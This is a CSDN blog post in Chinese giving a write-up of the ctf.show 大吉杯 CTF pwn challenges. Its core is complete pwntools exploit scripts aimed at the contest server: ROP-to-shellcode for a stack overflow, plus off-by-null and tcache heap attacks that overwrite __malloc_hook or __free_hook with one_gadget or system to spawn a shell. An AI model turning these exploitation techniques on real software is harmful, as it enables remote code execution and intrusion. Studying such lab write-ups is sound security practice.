大吉杯--ctf.show

最新推荐文章于 2024-07-28 22:46:06 发布
最新推荐文章于 2024-07-28 22:46:06 发布
阅读量604 收藏 1
点赞数 2
分类专栏: 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/113099522
版权

签到

bilibili搜索CTFShow,直播👀flag

问卷调查

填好即可拿到

easyrop

简单栈溢出,将返回地址写成ROP然后在data段布置shellcode跳过去执行即可,我写了2段估计有大师傅分分钟秒解开

from pwn import *
context.terminal=['tmux','splitw','-h']
#p=process("./easyrop")
p=remote("111.231.70.44",28092)
offset=64
context.arch='amd64'
sl=asm(shellcraft.sh())
shellcode='''
pop rax
pop rsi
syscall
ret
'''
payload='a'*offset+p64(0x0004000B9)+p64(0x0000006000E0)+p64(0)+p64(0x6000E0+0x60)+p64(0x06000E0+0x60)
p.sendafter("easyrop",payload)
sleep(2)
p.send(asm(shellcode))
sleep(4)
p.send("a")
sleep(3)
p.send(sl)
p.interactive()

big_family

off by null用malloc_console构造堆块重叠写top_chunk到malloc_hook上方即可

#coding=utf-8
from pwn import *
#p=process("./family")
p=remote("111.231.70.44",28003)
elf=ELF("./family")
libc=elf.libc


def menu(idx):
	p.sendlineafter(":",str(idx))

def add(size,data):
	menu(1)
	p.sendlineafter("?",str(size))
	p.sendafter("?",data)

def delete(idx):
	menu(2)
	p.sendlineafter("?",str(idx))

def show(idx):
	menu(3)
	p.sendlineafter("?",str(idx))



context.terminal=['tmux','splitw','-h']
add(0x18,"AAA\n")
for i in range(13):
	add(0x38,"A"*8+str(i)+"\n")
#add(0x10,")
add(0x18,p64(0)+p64(0x41)+"\n")
add(0x40,"\x00"*0x28+p64(0x21)+"\n")

delete(0)
delete(4)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)

menu('1'*0x500)

add(0x38, "B"*0x30+p64(0x120))

add(0x38, "C"*0x30+p32(0x40)+"\n")
add(0x38, "p"*0x30+"\n")
delete(4)
menu('1'*0x500)
delete(10)
menu("1"*0x500)
add(0x38,"a\n")
add(0x38,"a\n")
add(0x38,"a\n")
show(5)
libcbase=u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")-libc.sym['__malloc_hook']-0x10-88
log.success("libcbase: "+hex(libcbase))
add(0x38, "GGG\n")#8=5
delete(0)
delete(8)
show(5)
p.recvuntil("\n")
heap=u64(p.recv(6)+"\x00\x00")-0xe0
log.success("heap: "+hex(heap))
#delete(5)
add(0x38, "dd\n")#
add(0x38, "dd\n")#0
delete(0)
delete(8)
delete(5)
delete(15)
malloc_hook=libcbase+0x3c4b10
add(0x38,p64(heap+0x370)+"\n")
add(0x38, "dd\n")
add(0x38, "dd\n")
#delete(0)
delete(14)
add(0x38, p64(0)+p64(0x51)+p64(libcbase+libc.sym['__malloc_hook']+0x10+5)+"\n")
add(0x40, "aa\n")
#delete(0)
add(0x40, '\xaa'*3+p64(0x51)+p64(malloc_hook+0x10+0x10)+"\n")
add(0x47, "\x00"*0x38+p64(malloc_hook-0x18)+"\n")
one=libcbase+0x4527a
#delete(8)
#add(0x40,p64(0)+p64(one)+"\n")
for i in range(4):
	delete(i)
for i in range(6,10):
	delete(i)
add(0x47,"dd\n")
add(0x47,"dd\n")
add(0x47,"dd\n")
realloc=libcbase+0x846c0#libc.sym['__libc_realloc']
add(0x47,p64(libcbase+0x4526a)+p64(realloc+16)+"\n")

#delete(11)
#delete(5)
#show(8)
#delete()
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
'''

'''
p.interactive()

virtual

这道题其实也是堆,就只要逆向一下指令就行了

from pwn import  *


#p=process('./baby_vm')
p=remote("111.231.70.44",28085)
elf=ELF('./baby_vm')
libc=ELF("./libc-2.27.so")
def add(size):
    return '\x06'+chr(size)

def nop():
    return '\x02'

def push(content):
    return '\x00\x40'+p64(content)

def pop():
    return '\x01\x40'

def edit():
    return '\x05\x01'

def show():
    return '\x05\x02'

def free():
    return '\x07'

def ret():
    return '\x08'

#pause()
payload=add(0xf0)+free()+add(0xe0)+free()+add(0xd0)+free()+add(0xc0)+free()+add(0xb0)+free()+add(0xa0)+free()+add(0x90)+free()+add(0xf0)+pop()+push(0x461)+free()+add(0x20)+show()+free()+ret()
p.sendafter(':',payload)
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-0x10-96-0x400
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
pause()
payload=add(0x40)+free()+add(0x60)+free()+add(0x70)+push(0)+push(0xe1)+push(free_hook)+free()+add(0xe0)+pop()+push(0x31)+free()+add(0xe1)+push(system)+free()+add(0x50)+edit()+free()
p.sendafter(':',payload)
#p.recv
#p.sendafter(':',payload)
#pause()
#push(0x123)
p.interactive()

easy_note

在编辑的地方可以把size改大然后泄漏随机数和libc,之后有一个任意地址写,写_free_hook即可

from pwn import *
#p=process("./daji2")
p=remote("111.231.70.44",28146)
elf=ELF("./daji2")
libc=ELF("./libc-2.27.so")
context.terminal=['tmux',"splitw","-h"]

def menu(idx):
	p.sendlineafter(">",str(idx))

def add(size):
	menu(1)
	p.sendlineafter(":",str(size))

def show(idx):
	menu(2)
	p.sendlineafter(":",str(idx))

def edit(idx,size,data):
	menu(3)
	p.sendlineafter(":",str(idx))
	p.sendlineafter(":",str(size))
        #pause()
        sleep(4)
	p.send(data)


add(0x18)
add(0x68)
edit(0,0x20,"a"*0x18+p64(0x100))#+p64(100)+p64(0x4312321)+p64(0x602120))
show(0)
p.recvuntil("a"*0x18)
p.recv(8)
magic=u32(p.recv(4))
print hex(magic)
libcbase=u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
libcbase1=libcbase+0x400000
system=libcbase+libc.sym['system']
log.success("libcbase: "+hex(libcbase))
log.success("libcbase1: "+hex(libcbase1))
one=libcbase1+0x10a41c
free_hook=libcbase1+libc.sym['__free_hook']
log.success("libcbase: "+hex(free_hook))
#edit(0,0x100,"a"*0x18+p64(0x100)+p64(magic)+"doudou")
menu(3)
p.sendlineafter(":",str(0))
p.sendlineafter(":",str(0x80))
sleep(4)
p.send("a"*0x18+p64(0x100)+p64(magic)+p64(free_hook))
menu(3)
p.sendlineafter(":",str(0))
p.sendlineafter(":",str(0x10))
sleep(4)
p.send(p64(one))
'''
0x4f365 execve("/bin/sh", rsp+0x40, environ)
constraints:
      rsp & 0xf == 0
        rcx == NULL

        0x4f3c2 execve("/bin/sh", rsp+0x40, environ)
        constraints:
              [rsp+0x40] == NULL

              0x10a45c execve("/bin/sh", rsp+0x70, environ)
              constraints:
                    [rsp+0x70] == NULL
'''
p.interactive()
doudoudedi
关注
专栏目录
ctf.show与学习笔记
Q221022的博客
01-29 3159
ctf.show 1.密码学签到 看到密文之后不难发现,flag就是倒着写的,直接将密文倒叙输出就是答案 2. 看到题目,全是由符号组成的,将题目内容全部复制到控制台,回车即可得到答案 3. 第三题与第二题看起来是一样的,所以先将其复制到控制台,发现报错了,有中文的引号,将所有的引号全部换成英文之后还是没有得到flag,········(不会了,没有思路了) 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...
ist的matlab代码-darkarmy-ctf.github.io:darkarmy-ctf.github.io
05-26
Army是一支由CTF组成的国际团队,只是一个具有良好安全意识的普通团队,同时也是努力工作的网络安全爱好者。 CTF和黑客机器的使用 DarkCTF即将推出... DarkArmy的我们正在为那里的所有黑客组织一个Capture The Flag...
CTFSHOW easyrsa1-6 Writeup
abtgu的博客
09-17 2435
easyrsa1 题目: 无 解题思路: 题中给了e,n,c,可以分解n得到p,q,在线分解大整数网址http://www.factordb.com/index.php 。脚本如下: import gmpy2 import binascii e = 65537 n = 1455925529734358105461406532259911790807347616464991065301847 c = 69380371057914246192606760686152233225659503366319332
ctf.show(超详解)——信息搜集web1-web20
最新发布
2201_76115387的博客
07-28 458
CTF.show——信息搜集篇
CTFSHOW-大吉大利
打酱油的杯具的博客
02-01 1690
CTFSHOW-大吉大利 文章目录CTFSHOW-大吉大利十八般兵器请问大吉的签到是在这里签吗牛年大吉色图生成器 被血虐,又菜又无知,只做出了无脑的拼图(真-有手就行) 以下wp参考是Mumuzi大佬的wp,仅仅是做个复现,建议看大佬的原博客: https://blog.csdn.net/qq_42880719/article/details/113068933 十八般兵器 感谢@i_kei师傅供题 刀、枪、剑、戟、斧、钺、钩、叉、鞭、锏、锤、戈、镋、棍、槊、棒、矛、耙 hint1:JPHS hin
ctfshow 大吉大利
akxnxbshai的博客
12-08 844
复现一下。
ctf.show
nidaxin的博客
02-05 3047
爆破 21.【自定义迭代器】 先抓包看看,返回包里面有个admin,所以就猜测用户名是admin
【XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
unrar-ctf.tar.gz
05-21
《CTF挑战与RAR文件处理:深入理解"unrar-ctf.tar.gz"》 在信息安全领域,Capture The Flag(CTF)比赛是一种常见的技术竞赛形式,它涉及到各种网络安全技能,包括逆向工程、漏洞挖掘、密码学以及文件解析等。在...
2022--CTF-Web.pdf
07-09
2022--CTF-Web
华山ctf--misc200.rar
09-30
1. **华山ctf--misc200.docx**:这是一个Microsoft Word文档,可能包含了文字提示、隐藏数据或者是通过某些编码或加密方式隐含的信息。解题者需要了解文档格式,如XML结构,查找可能的隐藏内容,或者使用工具进行...
CTFshow--DJBCTF(大吉大利) WEB--spaceman
volcano的博客
01-25 1123
师傅们出的MISC题做得有点上头,虽然最后也只做出来四题,web题也没来得及看。。。 源码: <?php error_reporting(0); highlight_file(__FILE__); class spaceman { public $username; public $password; public function __construct($username,$password) { $this->username = $use
ctfshow(刷题经历)
qq_62046696的博客
06-26 1680
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
ctf.show 入门篇
Sky_Bird_的博客
12-03 1128
ctf.show web入门 1.web 1 打开后如图所示,按F12,看到flag 2.web 2 打开后发现按F12没有用,直接在网址前加view-source: 拿到flag 3.
ctf.show 愚人
Welcome To Myon'Blog !
04-02 2610
愚人,ctf.show,MISC,WEB,base编码,PHP伪协议,010editor,zip伪加密,png
ctfshow-WEB-web8
热门推荐
wangyuxiang946的博客
09-05 2万+
ctf.show WEB模块第8关是一个SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字, 1. 过滤空格, 可以使用括号() 或者注释/**/ 绕过 2. 过滤and, 可以使用or替代 3. 过滤union, 可以用盲注替代联合注入 4. 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替 首先确定注入点, 输入...
ctf.show命令执行(web29-web124)
wanan的博客
08-31 6278
ctf.show命令执行(web29-web124)
ctf.show算力超群
08-15
ctf.show是一个CTF竞赛平台,为参赛者提供了丰富的题目和挑战,需要进行漏洞利用、密码破解、逆向工程等各种技术方面的攻防对抗。算力在CTF比赛中往往是非常重要的,因为一些题目需要进行高强度的计算或者复杂的加密...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值